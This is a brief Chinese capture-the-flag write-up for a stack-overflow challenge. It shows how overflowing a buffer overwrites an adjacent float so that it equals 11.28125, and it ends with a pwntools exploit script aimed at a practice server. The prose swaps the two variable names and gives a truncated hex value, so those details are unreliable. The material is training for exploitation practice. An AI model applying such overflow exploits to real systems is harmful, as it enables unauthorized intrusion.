分析
使用file命令查看文件信息
使用IDA64打开文件
进入func函数
如果 v2 等于 11.28125
就可以拿到flag
可以看到v1有栈溢出,并且v1在v2的上面,可以通过溢出v2来覆盖v1的值从而获取flag
首先v1是浮点数 11.28125
的二进制是 0x413480
exp
from pwn import *
context.arch = 'amd64'
p = remote('node4.buuoj.cn',26625)
p.sendline(flat([b'a'*(0x30-4) , 0x41348000]))
p.interactive()